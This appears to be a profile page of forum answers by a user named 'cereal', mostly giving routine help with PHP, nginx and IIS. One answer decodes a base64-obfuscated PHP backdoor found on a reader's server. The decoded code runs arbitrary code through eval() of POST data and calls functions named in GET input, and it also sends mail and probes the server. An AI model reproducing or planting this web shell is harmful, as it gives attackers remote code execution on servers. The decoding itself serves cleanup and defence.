Posts by cereal

I just read system requirements on their website, check the link, bye :)

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

last string is hex code, while the rest is base64, this is the translation:

/**
 * @version 2.6
 *
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        $code();
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{

        $to = "air@example.com";
        $subj = "SUBJ!";
        $message = "EHLO";
        $res = mail($to,$subj,$message);
        if($res)
        {
            echo $_POST["test_message"];
        }
        else
        {
            echo strrev($_POST["test_message"]);
        }
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);

        eval($code);
        //return;
}

last string:

echo base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7');
# output:
# $code = base64_decode($_);
# eval($code);

You can start by removing it and sanitizing the data you get from any script in which you use POST or GET methods.

Check /var/lib/mysql/ for each database there is a directory with table files, for each table in database you have three different files. You need to have root permission to access those directories. Bye.

Check for CI session or for msession:
http://www.mohawksoft.org/?q=node/8
http://php.net/manual/en/book.msession.php
bye

This is JSON, use print_r(json_decode($data,true)); to display the array, bye.

You can use str_split(): http://www.php.net/manual/en/function.str-split.php

$string = file_get_contents('file.ext'); # source file
echo implode(';',str_split($string,10));

Just as side note: in addition to rch1231 suggestions, you can also consider to use a tool like Supervisord, it can help you to keep running processes in background, even if a crash happens Supervisord will restore the process by itself: http://supervisord.org/

bye.

Start from here: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

bye!

This method is called Ternary Operator, check this: http://www.php.net/manual/en/language.operators.comparison.php#language.operators.comparison.ternary

bye :)

That's an IF statement:

if(isset($_SESSION['products']))
{
    $products = $_SESSION['products']; 
} else {
    $products = array();
}

Or

$products = array();
if(isset($_SESSION['products']))
{
    $products = $_SESSION['products']; 
}

For example you can set a range from 1 to 4 and do a for loop until you complete the given range:

$a = range(1,4); #or start from zero
for($i = 1; $i < $a ; $i++) { echo $msg[$i]; }

Try to define <?php $programLimit = array(); ?> before the foreach loop, bye.

In addition to Ardav suggest, you can set the path in Windows Environment Variables, I don't have a Windows box, but searching on google it seems you can access to that going into Control Panel > System > Advanced > Environmental Variables as suggested here:

http://us2.php.net/manual/en/faq.installation.php#faq.installation.addtopath

bye.

This error message means that PHP is not installed or path is not set.

Then refer to these instructions: http://pear.php.net/manual/en/installation.getting.php

I'm referring to line 45 and 46, if this is empty then you get an error, if you define a default case you have also to insert some code:

default:
echo 'default case'; # example
break;

bye :)

In order to install a pear package you need to run a terminal and type the install commands there, not all hosting plans allows terminal sessions (ssh). Which platform are you using: linux, windows? Are you testing in a local server?

Search for PHP fork examples and read here: http://php.net/manual/en/function.pcntl-fork.php

bye.

Default case in switch() can't be blank, so or you remove it or you assign an action.

Check inside IE/front-page.php or post that code. The error is there.

You can use parse_url function: http://php.net/manual/en/function.parse-url.php
bye.

Have you tried json_encode()? http://php.net/manual/en/function.json-encode.php
But I'm afraid you have to loop anyway.

You may want to move your thread to http://www.daniweb.com/business-exchange/post-your-resume/52

bye ;D

You can use get_browser(): http://php.net/manual/en/function.get-browser.php
But the client can spoof the user agent, so don't trust what you get and always sanitize the data, because an XSS attack can be performed.

Check this: https://help.ubuntu.com/11.10/serverguide/C/mysql.html
bye.

Fine, mark the thread as solved, bye :)

is this correct. My image is not loading on right. A red cross(X) sign is coming.

$imagepath = "shirt7.jpg"; # check this!

Then check the path. Is your image in the same directory of your script file?

oops! Hi Ardav ;D

Basically you can add style="float:right;" to img tag. This thread is related more to CSS forum than PHP, I suggest you to move it, bye :)

You should use ftp, some browsers limit uploads to 2GB, check:

1. http://blogs.msdn.com/b/ieinternals/archive/2011/03/10/wininet-internet-explorer-file-download-and-upload-maximum-size-limits.aspx
2. http://www.motobit.com/help/scptutl/pa98.htm

bye.

I can't try on a Windows box right now, but you have to set an absolute path, as you already did and reload the server. Check your nginx PHP config, maybe you set another root for PHP scripts? http://wiki.nginx.org/PHPFastCGIOnWindows

And try to open a simple index.html page before trying to point to index.php so change directive index to search for index.html first. You can also set error and access logs, that will be helpful, you can see where the pages are currently opened. Bye :)

What is not working for you? Have you tried these:

- http://wiki.nginx.org/VirtualHostExample
- http://library.linode.com/web-servers/nginx/configuration/basic
- http://articles.slicehost.com/2009/9/1/debian-lenny-nginx-virtual-hosts-1

If you are testing on local then you have to edit /etc/hosts file, adding a new line with something like:

127.0.0.1 virtual_domain_host.tld

Where virtual_domain_host.tld is the choosen server_name, otherwise you need to register your domain to a DNS server.

It seems you need to change the setting for maxRequestLength attribute which is found both in Machine.config and Web.config, this last file should be site specific, anyway check these links:

- http://masstechnical.com/Blog/tabid/100/EntryId/7/IIS-7-5-Setting-for-File-Upload-Size.aspx
- http://www.iis.net/ConfigReference/system.webServer/security/requestFiltering/requestLimits
- http://support.microsoft.com/default.aspx?scid=kb;EN-US;295626

or just search on google for "IIS 7.5 upload file size limits", I can't help more than this, bye.

How much large are these files? IIS limits uploads to 30MB by default and maximum upload should be around 2GB.

You can read remote modify time and then use touch(): http://php.net/manual/en/function.touch.php
If you are in a linux box you can use exec() and terminal command touch:

exec('touch -m -d "2009-12-25 11:06:30" file.txt');

Otherwise download archives like zip, gz, tar, this should prevent changes in the modify time.

You can point the form to an iframe through target attribute, so when you submit the form, only the iframe will be reloaded, an example:

<form action="a.php" target="result" method="post">
<input type="text" name="msg" /><br />
<input type="submit" name="submit" value="send" />
</form>

<iframe name="result" src="a.php"></iframe>

bye.

If you are referring to the e-commerce platform then look at system requirements:

- http://www.magentocommerce.com/system-requirements

it works only on linux. Bye.

You are missing some quotes: $form->data[lastName] should be $form->data['lastName'] and so on. Bye.

You can read this article: http://oreilly.com/php/archive/mvc-intro.html
And after you can search for a PHP framework using MVC and study how it works. Bye :)

From: http://php.net/manual/en/function.create-function.php

Usually these parameters will be passed as single quote delimited strings. The reason for using single quoted strings, is to protect the variable names from parsing, otherwise, if you use double quotes there will be a need to escape the variable names, e.g. \$avar.

bye :)

Read this guide: http://phpsec.org/projects/guide/
Bye.

Change it to:

$sub = $item->item_qty * $item->item_price * (($item->kilogram == 0) ?:$item->kilogram);

# inside the array:
'item_subtotal' => $sub,
'item_total' => $sub

bye :)

Are you using Full-text searches? Check this: http://dev.mysql.com/doc/refman/5.5/en/fulltext-search.html

bye.

Read this: http://www.tizag.com/phpT/forms.php
But you can find a lot of them just searching form PHP forms, HTML forms.. Bye.

You're welcome, bye :)

Just an update on function start() this will speed up the execution and use less memory:

public function start($arrayA,$arrayB)
    {
        global $a;
        global $b;
        global $c;
        
        $replace = array(',',' ','','-');
        $a = str_split(str_replace($replace,'',$arrayA));
        
        if(empty($arrayB))
        {
            $bArr = false;
            $b = array();
        } else {
            $bArr = true;
            $b = str_split(str_replace($replace,'',$arrayB));
        }
        
        $c = ($bArr == false) ? $a : array_merge($a,$b);
        
        if(count($c) > 5)
        {
            return 'too long';
        }
        elseif(count($c) <= 1)
        {
            return 'too short';
        }
        else
        {
            $size = count($c)-1;
            $perm = range(0, $size);
            $j = 0;

            do
            {
                foreach ($perm as $i) { $perms[$j][] = $c[$i]; }
            }
            while($perm = $this->p($perm, $size) and ++$j);
            
            $list = array_map('join',$perms);
            $list = array_unique($list);
            $list = array_merge(array(),$list);
            $list = array_unique($this->ps($list));
            $result = array_merge(array(),$list);
            
            return $result;
        }
    }

The permutation function p() creates a lot of duplicates, so using $list = array_unique($list); helps to reduce data sent to function ps(). Bye.

Please use CODE tags and tell us in which line you get the error. Bye.

Do you mean a background?

You can set an url as first parameter:

<?php
$xml = new SimpleXMLElement('file.xml',false,true); # try also with $data
print_r($xml);
?>

As second paramenter you can set these constants: http://php.net/manual/en/libxml.constants.php
Third paramenter is needed to declare source (in first parameter) as a file and not data strings like something you get from file_get_contents(). Your output should be:

SimpleXMLElement Object
(
    [ip_address] => 69.72.129.3
    [ip_type] => Mapped
    [Network] => SimpleXMLElement Object
        (
            [organization] => fortressitx
            [carrier] => fortressitx
            [asn] => 25653
            [connection_type] => tx
            [line_speed] => high
            [ip_routing_type] => fixed
            [Domain] => SimpleXMLElement Object
                (
                    [tld] => net
                    [sld] => cyberleo
                )

        )

    [Location] => SimpleXMLElement Object
        (
            [continent] => north america
            [latitude] => 40.83243
            [longitude] => -74.13984
            [CountryData] => SimpleXMLElement Object
                (
                    [country] => united states
                    [country_code] => us
                    [country_cf] => 99
                )

            [region] => mid atlantic
            [StateData] => SimpleXMLElement Object
                (
                    [state] => new jersey
                    [state_code] => nj
                    [state_cf] => 95
                )

            [dma] => 501
            [msa] => 35620
            [CityData] => SimpleXMLElement Object
                (
                    [city] => clifton
                    [postal_code] => 07014
                    [time_zone] => -5
                    [area_code] => 973
                    [city_cf] => 80
                )

        )

)

bye.

Ok, change it like this:

$a = array();
while($row = mysql_fetch_object($r))
{
        if(array_key_exists($row->first_name,$a) == true)
        {
                array_push($a[$row->first_name],$row->last_name);
        }
        else
        {
                $a[$row->first_name] = array($row->last_name);
        }
}
$result = array_chunk($a,1,true);
print_r($result);

bye :)